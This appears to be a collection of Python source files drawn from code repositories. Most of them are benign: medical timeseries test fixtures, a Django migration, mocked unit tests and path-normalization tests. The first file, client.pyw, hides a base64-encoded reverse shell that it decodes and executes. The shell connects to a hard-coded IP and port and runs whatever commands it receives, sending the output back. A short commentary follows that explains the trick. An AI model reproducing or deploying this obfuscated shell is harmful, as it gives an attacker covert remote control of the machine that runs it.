30cac20393493165d1a227a9be3bedeac5a5e8d1 | 1,232 | pyw | Python | Python3/Projetos/client.pyw | cauabeisola/Projetos-e-afins | 61492014393e4bc7506ba1490d3790778af1ab4a | [
"MIT"
] | 1 | 2021-11-25T23:30:28.000Z | 2021-11-25T23:30:28.000Z | Python3/Projetos/client.pyw | cauabeisola/Projetos-e-afins | 61492014393e4bc7506ba1490d3790778af1ab4a | [
"MIT"
] | null | null | null | Python3/Projetos/client.pyw | cauabeisola/Projetos-e-afins | 61492014393e4bc7506ba1490d3790778af1ab4a | [
"MIT"
] | null | null | null | import base64
codigo = 'aW1wb3J0IHNvY2tldAppbXBvcnQgc3lzCmltcG9ydCBvcwppbXBvcnQgc3VicHJvY2VzcwoKaXBfc2Vydmlkb3IgPSAnMTkyLjE2OC4xMDAuMjgnCnBvcnRhX3NlcnZpZG9yID0gNDQ1Ngp0YW1hbmhvX2J1ZmZlciA9IDEwMjQgKiAxMjgKc2VwYXJhZG9yID0gJzwtPicKCnMgPSBzb2NrZXQuc29ja2V0KCkKCnMuY29ubmVjdCgoaXBfc2Vydmlkb3IsIHBvcnRhX3NlcnZpZG9yKSkKCmN3ZCA9IG9zLmdldGN3ZCgpCnByaW50KGN3ZCkKcy5zZW5kKGN3ZC5lbmNvZGUoKSkKCndoaWxlIFRydWU6CiAgICBjb21hbmRvX3NoZWxsID0gcy5yZWN2KHRhbWFuaG9fYnVmZmVyKS5kZWNvZGUoKQogICAgaWYgY29tYW5kb19zaGVsbC5sb3dlcigpID09ICdzYWlyJzoKICAgICAgICBzLmNsb3NlKCkKICAgIGlmIGNvbWFuZG9fc2hlbGwuc3BsaXQoKVswXSA9PSAnY2QnOgogICAgICAgIHRyeToKICAgICAgICAgICAgb3MuY2hkaXIoJycuam9pbihjb21hbmRvX3NoZWxsLnNwbGl0KClbMV0pKQogICAgICAgIGV4Y2VwdCBGaWxlTm90Rm91bmRFcnJvciBhcyBlOgogICAgICAgICAgICByZXN1bHQgPSBlCiAgICAgICAgZWxzZToKICAgICAgICAgICAgcmVzdWx0ID0gJycKICAgIGVsc2U6CiAgICAgICAgcmVzdWx0ID0gc3VicHJvY2Vzcy5nZXRvdXRwdXQoY29tYW5kb19zaGVsbCkKICAgIGN3ZCA9IG9zLmdldGN3ZCgpCiAgICBtZW5zYWdlbSA9IGYne3Jlc3VsdH17c2VwYXJhZG9yfXtjd2R9JwogICAgcy5zZW5kKG1lbnNhZ2VtLmVuY29kZSgpKQo='
mensagem_base64 = codigo
base64_bytes = mensagem_base64.encode('ascii')
mensagem_bytes = base64.b64decode(base64_bytes)
mensagem = mensagem_bytes.decode('ascii')
print(mensagem)
exec(mensagem) | 123.2 | 1,023 | 0.963474 | 28 | 1,232 | 42.178571 | 0.428571 | 0.020322 | 0.032176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109736 | 0.016234 | 1,232 | 10 | 1,024 | 123.2 | 0.864686 | 0 | 0 | 0 | 0 | 0 | 0.828873 | 0.820762 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0.125 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
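The client above ships its logic as an embedded base64 blob and `exec`s it after decoding — a common reverse-shell packaging trick. The decode step itself is plain standard-library `base64`; a safer, inspection-only sketch of the same round-trip (decoding without executing anything) looks like this:

```python
import base64

def decode_payload(encoded: str) -> str:
    """Decode a base64-encoded ASCII payload back to readable source text."""
    return base64.b64decode(encoded.encode('ascii')).decode('ascii')

# Round-trip a small sample instead of the embedded payload.
sample = base64.b64encode(b"print('hello')").decode('ascii')
assert decode_payload(sample) == "print('hello')"
```

Decoding and reading the payload this way is how to see what such a script would run; calling `exec` on a decoded blob, as client.pyw does, executes it blindly.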
30fac373a99683af9c6237f7d1d31894c705e15f | 2,861 | py | Python | moberg_processor/tests/params.py | Pennsieve/timeseries-processor | 85766afa76182503fd66cec8382c22e757743f01 | [
"Apache-2.0"
] | null | null | null | moberg_processor/tests/params.py | Pennsieve/timeseries-processor | 85766afa76182503fd66cec8382c22e757743f01 | [
"Apache-2.0"
] | null | null | null | moberg_processor/tests/params.py | Pennsieve/timeseries-processor | 85766afa76182503fd66cec8382c22e757743f01 | [
"Apache-2.0"
] | null | null | null | from base_processor.timeseries.tests import TimeSeriesTest, ChannelTest
channels_00 = [
ChannelTest(name='EEG - ECG', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Fp1', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - O2', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T5', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - P3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='HR', nsamples=1056913, rate=0.98, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - LOC', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - P4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - ROC', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - O1', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Fp2', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F7', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - A1', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F8', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - C3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Pz', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='SpO2', nsamples=989390, rate=0.98, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - C4', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='CVP', nsamples=0, rate=93.7, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - T6', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='CVP', nsamples=13644024, rate=124.9, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - A2', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Fz', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - F3', nsamples=262144, rate=256.0, channel_type='CONTINUOUS'),
ChannelTest(name='EEG - Cz', nsamples=262144, rate=256.0, channel_type='CONTINUOUS')]
# parametrize
params_channel = [
TimeSeriesTest(
name = 'data.moberg.gz',
nchannels = len(channels_00),
channels = channels_00,
result = 'pass',
inputs = {
'file' : '/test-resources/data.moberg.gz'
})
]
| 65.022727 | 88 | 0.699406 | 366 | 2,861 | 5.377049 | 0.185792 | 0.213415 | 0.29878 | 0.439024 | 0.82622 | 0.82622 | 0.786585 | 0.786585 | 0.764736 | 0.717988 | 0 | 0.120724 | 0.131423 | 2,861 | 43 | 89 | 66.534884 | 0.671227 | 0.003845 | 0 | 0 | 0 | 0 | 0.189958 | 0.010534 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.025 | 0.025 | 0 | 0.025 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
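The fixture above is essentially a table of per-channel expectations (name, sample count, rate, type). A minimal sketch of how such a fixture can be queried — using a `namedtuple` as a hypothetical stand-in for `ChannelTest`, whose real definition lives in `base_processor.timeseries.tests` — might look like:

```python
from collections import namedtuple

# Hypothetical stand-in for ChannelTest; the real class takes the same keyword fields.
Channel = namedtuple('Channel', ['name', 'nsamples', 'rate', 'channel_type'])

channels = [
    Channel('EEG - ECG', 262144, 256.0, 'CONTINUOUS'),
    Channel('HR', 1056913, 0.98, 'CONTINUOUS'),
    Channel('SpO2', 989390, 0.98, 'CONTINUOUS'),
]

# Group the expected channels by sampling rate, as a fixture sanity check might.
eeg_rate = [c.name for c in channels if c.rate == 256.0]
assert eeg_rate == ['EEG - ECG']
```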
eb53d34ff66f4b35c800ecc7c0daff2c7c59f4ff | 1,941 | py | Python | downtime/main/migrations/0001_initial.py | GSCrawley/downtime | 57a1c8e00424c1948e1650cd980d541174febbd8 | [
"MIT"
] | 1 | 2020-05-03T03:57:26.000Z | 2020-05-03T03:57:26.000Z | downtime/main/migrations/0001_initial.py | GSCrawley/downtime | 57a1c8e00424c1948e1650cd980d541174febbd8 | [
"MIT"
] | null | null | null | downtime/main/migrations/0001_initial.py | GSCrawley/downtime | 57a1c8e00424c1948e1650cd980d541174febbd8 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.3 on 2020-03-04 04:33
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Library',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Music',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('album', models.CharField(max_length=200)),
                ('artist', models.CharField(max_length=200)),
                ('genre', models.CharField(max_length=200)),
                ('library', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Library')),
            ],
        ),
        migrations.CreateModel(
            name='Movie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('library', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Library')),
            ],
        ),
        migrations.CreateModel(
            name='Book',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=200)),
                ('author', models.CharField(max_length=200)),
                ('library', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Library')),
            ],
        ),
    ]
| 38.058824 | 114 | 0.564142 | 194 | 1,941 | 5.525773 | 0.262887 | 0.11194 | 0.134328 | 0.179104 | 0.762127 | 0.711754 | 0.711754 | 0.711754 | 0.711754 | 0.711754 | 0 | 0.028384 | 0.292117 | 1,941 | 50 | 115 | 38.82 | 0.75182 | 0.023184 | 0 | 0.627907 | 1 | 0 | 0.069694 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.046512 | 0 | 0.139535 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ebbcf096f504b7341328b9756ed82d4d1a9afb05 | 5,288 | py | Python | tests/fortify/list_test.py | matt-fevold/webbreaker | b500fc620ebba03a27321c8f832ab77bb760b9c5 | [
"MIT"
] | 7 | 2018-12-20T19:18:43.000Z | 2019-12-10T15:03:41.000Z | tests/fortify/list_test.py | matt-fevold/webbreaker | b500fc620ebba03a27321c8f832ab77bb760b9c5 | [
"MIT"
] | 5 | 2019-04-02T17:07:44.000Z | 2020-02-17T07:08:11.000Z | tests/fortify/list_test.py | matt-fevold/webbreaker | b500fc620ebba03a27321c8f832ab77bb760b9c5 | [
"MIT"
] | 7 | 2019-01-10T10:40:55.000Z | 2022-03-13T14:08:37.000Z | import mock
import pytest
from webbreaker.fortify.list import FortifyList
def attribute_error_exception(**kwargs):
    raise AttributeError('Test Failure')


def unbound_local_error_exception(**kwargs):
    raise UnboundLocalError('Test Failure')


def type_error_exception(**kwargs):
    raise TypeError('Test Failure')


@mock.patch('webbreaker.fortify.list.FortifyList.list')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
def test_fortify_list_successful_init_valid_application_name(config_mock, auth_mock, list_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    auth_mock.return_value.authenticate.return_value = expected_username, expected_password

    fortify_list = FortifyList(username=None,
                               password=None,
                               application_name=expected_application)

    assert fortify_list.username == expected_username
    assert fortify_list.password == expected_password
    list_mock.assert_called_once_with(expected_application)
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1


@mock.patch('webbreaker.fortify.list.FortifyList.list')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
def test_fortify_list_successful_init_no_application_name(config_mock, auth_mock, list_mock):
    expected_username = 'user'
    expected_password = 'password'
    auth_mock.return_value.authenticate.return_value = expected_username, expected_password

    fortify_list = FortifyList(username=None,
                               password=None,
                               application_name=None)

    assert fortify_list.username == expected_username
    assert fortify_list.password == expected_password
    list_mock.assert_called_once_with(None)
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1


@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
def test_fortify_list_list_successful_list(config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    auth_mock.return_value.authenticate.return_value = expected_username, expected_password

    fortify_list = FortifyList(username=expected_username,
                               password=expected_password,
                               application_name=expected_application)

    assert fortify_list.username == expected_username
    assert fortify_list.password == expected_password
    config_mock.assert_called_once()
    assert config_mock.call_count == 1
    assert auth_mock.call_count == 1
    assert client_mock.call_count == 1


@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
@mock.patch('webbreaker.fortify.list.Logger.app.critical')
def test_fortify_list_list_throws_attribute_error(log_mock, config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    client_mock.side_effect = attribute_error_exception

    with pytest.raises(SystemExit):
        FortifyList(username=expected_username,
                    password=expected_password,
                    application_name=expected_application)
    log_mock.assert_called_once()


@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
@mock.patch('webbreaker.fortify.list.Logger.app.critical')
def test_fortify_list_list_throws_unbound_local_error(log_mock, config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    client_mock.side_effect = unbound_local_error_exception

    with pytest.raises(SystemExit):
        FortifyList(username=expected_username,
                    password=expected_password,
                    application_name=expected_application)
    log_mock.assert_called_once()


@mock.patch('webbreaker.fortify.list.FortifyHelper')
@mock.patch('webbreaker.fortify.list.FortifyAuth')
@mock.patch('webbreaker.fortify.list.FortifyConfig')
@mock.patch('webbreaker.fortify.list.Logger.app.critical')
def test_fortify_list_list_throws_type_error(log_mock, config_mock, auth_mock, client_mock):
    expected_username = 'user'
    expected_password = 'password'
    expected_application = 'Test Application'
    auth_mock.return_value.authenticate.return_value = expected_username, expected_password
    client_mock.side_effect = type_error_exception

    with pytest.raises(SystemExit):
        FortifyList(username=expected_username,
                    password=expected_password,
                    application_name=expected_application)
    log_mock.assert_called_once()
| 38.882353 | 101 | 0.756619 | 600 | 5,288 | 6.343333 | 0.098333 | 0.106936 | 0.121387 | 0.143458 | 0.901209 | 0.898581 | 0.898581 | 0.898581 | 0.898581 | 0.898581 | 0 | 0.001569 | 0.156392 | 5,288 | 135 | 102 | 39.17037 | 0.851603 | 0 | 0 | 0.764706 | 0 | 0 | 0.184758 | 0.149206 | 0 | 0 | 0 | 0 | 0.186275 | 1 | 0.088235 | false | 0.205882 | 0.029412 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
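The failure-path tests above all rely on the same `unittest.mock` idiom: assign a module-level function to a mock's `side_effect` so that calling the patched dependency raises. A minimal standard-library demonstration of that pattern (independent of webbreaker; `boom` and `failing_client` are illustrative names):

```python
from unittest import mock

def boom(**kwargs):
    raise AttributeError('Test Failure')

# side_effect makes the mock raise when called, mimicking a failing dependency.
failing_client = mock.MagicMock(side_effect=boom)

try:
    failing_client(username='user')
except AttributeError as err:
    message = str(err)

assert message == 'Test Failure'
failing_client.assert_called_once()
```

The call is still recorded even though it raised, which is why the tests can assert both that a `SystemExit` occurred and that the logger mock was invoked.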
ebceffb1f1ea4a450c5272c257a0af11271d757d | 1,025 | py | Python | libs/httpserver/test/test_httpserver.py | SamP20/asyncservice | e2cf2d03d83163c9184d0582037d699b1714fc50 | [
"MIT"
] | null | null | null | libs/httpserver/test/test_httpserver.py | SamP20/asyncservice | e2cf2d03d83163c9184d0582037d699b1714fc50 | [
"MIT"
] | null | null | null | libs/httpserver/test/test_httpserver.py | SamP20/asyncservice | e2cf2d03d83163c9184d0582037d699b1714fc50 | [
"MIT"
] | null | null | null | import pytest
from samp20.httpserver import normalize_path
from aiohttp import web
def test_normalize_path():
    path = "/abc/def"
    parts = normalize_path(path)
    assert parts == ["abc", "def"]

    path = "/abc/def/"
    with pytest.raises(web.HTTPMovedPermanently) as exc_info:
        normalize_path(path)
    assert exc_info.value.location == "/abc/def"

    path = "/abc/.././def"
    with pytest.raises(web.HTTPMovedPermanently) as exc_info:
        normalize_path(path)
    assert exc_info.value.location == "/def"

    path = "/./abc/../def/./"
    with pytest.raises(web.HTTPMovedPermanently) as exc_info:
        normalize_path(path)
    assert exc_info.value.location == "/def"

    path = "/abc/../../.."
    with pytest.raises(web.HTTPMovedPermanently) as exc_info:
        normalize_path(path)
    assert exc_info.value.location == "/"

    path = "/abc/..//../../..//"
    with pytest.raises(web.HTTPMovedPermanently) as exc_info:
        normalize_path(path)
    assert exc_info.value.location == "/"
| 29.285714 | 61 | 0.653659 | 124 | 1,025 | 5.25 | 0.177419 | 0.107527 | 0.182796 | 0.211982 | 0.794163 | 0.794163 | 0.794163 | 0.794163 | 0.794163 | 0.794163 | 0 | 0.00243 | 0.197073 | 1,025 | 34 | 62 | 30.147059 | 0.788578 | 0 | 0 | 0.518519 | 0 | 0 | 0.099512 | 0 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.037037 | false | 0 | 0.111111 | 0 | 0.148148 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
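The assertions above pin down the contract of `normalize_path`: split on `/`, drop empty and `.` segments, resolve `..` without ever escaping the root, and redirect when the canonical form differs. The real implementation in `samp20.httpserver` is not shown here; the following is only a sketch of the part-splitting behavior those assertions describe (it omits the redirect-raising half):

```python
def normalize_parts(path: str):
    """Resolve '.', '..' and duplicate slashes without escaping the root."""
    parts = []
    for piece in path.split('/'):
        if piece in ('', '.'):
            continue          # skip empty segments and '.'
        if piece == '..':
            if parts:
                parts.pop()   # '..' never climbs above the root
        else:
            parts.append(piece)
    return parts

assert normalize_parts('/abc/def') == ['abc', 'def']
assert normalize_parts('/abc/.././def') == ['def']
assert normalize_parts('/abc/..//../../..//') == []
```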
ccdaa14e32dfa178633335bd76d9f739d5cebac9 | 8,512 | py | Python | tests/test_ewfimage.py | 3Peso/mosk | 24eccf2f2898f2508f32b52f55de30815475cddb | [
"CC0-1.0"
] | 3 | 2021-05-22T11:14:10.000Z | 2022-02-18T00:32:10.000Z | tests/test_ewfimage.py | 3Peso/mosk | 24eccf2f2898f2508f32b52f55de30815475cddb | [
"CC0-1.0"
] | 1 | 2021-06-20T07:18:58.000Z | 2021-09-19T12:24:03.000Z | tests/test_ewfimage.py | 3Peso/mosk | 24eccf2f2898f2508f32b52f55de30815475cddb | [
"CC0-1.0"
] | 1 | 2021-06-09T07:43:03.000Z | 2021-06-09T07:43:03.000Z | import platform
import unittest
from unittest import TestCase
from unittest.mock import patch, MagicMock
class TestEWFImageDunderInit(TestCase):
    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
    def test___init__image_info(self):
        """
        Should initialize member _imageInfo with EwfImageInfo object.
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo

        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
            self.assertEqual(expected_image_info, actual_ewf_image._imageinfo)

    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
    def test___init__initialize_partition_lookup(self):
        """
        Should call _initialize_partition_lookup
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo

        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
        init_mock = MagicMock(return_value=None)

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            with patch('source.ewfimage.EWFImage._initialize_partition_lookup', init_mock):
                EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
        init_mock.assert_called_once()

    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
    def test___init__filesysteminfo(self):
        """
        Should initialize member _filesysteminfo as empty dict.
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo

        expected_filesysteminfo: dict = {}
        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
            self.assertEqual(expected_filesysteminfo, actual_ewf_image._filesysteminfo)

    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
    def test___init__fs_discovered(self):
        """
        Should initialize member _fs_discoverd with False
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo

        expected_fs_discovered: bool = False
        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
            self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)

    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=True))
    def test___init__discover_parameter_true(self):
        """
        Should initialize member _fs_discoverd with True and call _initialize_partitions.
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo

        expected_fs_discovered: bool = True
        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
        init_mock = MagicMock(return_value=None)

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
                actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
                self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
        init_mock.assert_called_once()

    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
    def test___init__discover_parameter_false(self):
        """
        Should not call _initialize_partitions.
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo

        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
        init_mock = MagicMock(return_value=None)

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
                EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
        init_mock.assert_not_called()
class TestEWFImage(TestCase):
    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    @patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
    @patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
    @patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
    @patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
    def test_filesysteminfo_discover_not_set(self):
        """
        Should raise an error
        :return:
        """
        import pyewf
        from source.ewfimage import EWFImage, EWFImageInfo
        from businesslogic.errors import CollectorParameterError

        expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())

        with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
            ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
            with self.assertRaises(CollectorParameterError):
                ewf_image.filesysteminfo
class TestEWFPartitionFSObjectGetter(TestCase):
    @unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
    def test_fs_object(self):
        """Should raise LookupError if _fs_object is none"""
        from source.ewfimage import EWFPartition

        partition = EWFPartition(fs_object=None, partition={})
        with self.assertRaises(LookupError):
            partition.fs_object | 51.902439 | 115 | 0.727796 | 924 | 8,512 | 6.4329 | 0.095238 | 0.089502 | 0.124495 | 0.072678 | 0.85683 | 0.84926 | 0.84539 | 0.829071 | 0.829071 | 0.818809 | 0 | 0.003924 | 0.161772 | 8,512 | 163 | 116 | 52.220859 | 0.829152 | 0.054276 | 0 | 0.712963 | 0 | 0 | 0.27469 | 0.205187 | 0 | 0 | 0 | 0 | 0.083333 | 1 | 0.074074 | false | 0 | 0.185185 | 0 | 0.287037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7
69418f850b35b38d33f6a213b54cdf07c1d86abc | 3,675 | py | Python | z2/part3/updated_part2_batch/jm/parser_errors_2/941166032.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 1 | 2020-04-16T12:13:47.000Z | 2020-04-16T12:13:47.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/941166032.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
] | 18 | 2020-03-06T17:50:15.000Z | 2020-05-19T14:58:30.000Z | z2/part3/updated_part2_batch/jm/parser_errors_2/941166032.py | kozakusek/ipp-2020-testy | 09aa008fa53d159672cc7cbf969a6b237e15a7b8 | [
"MIT"
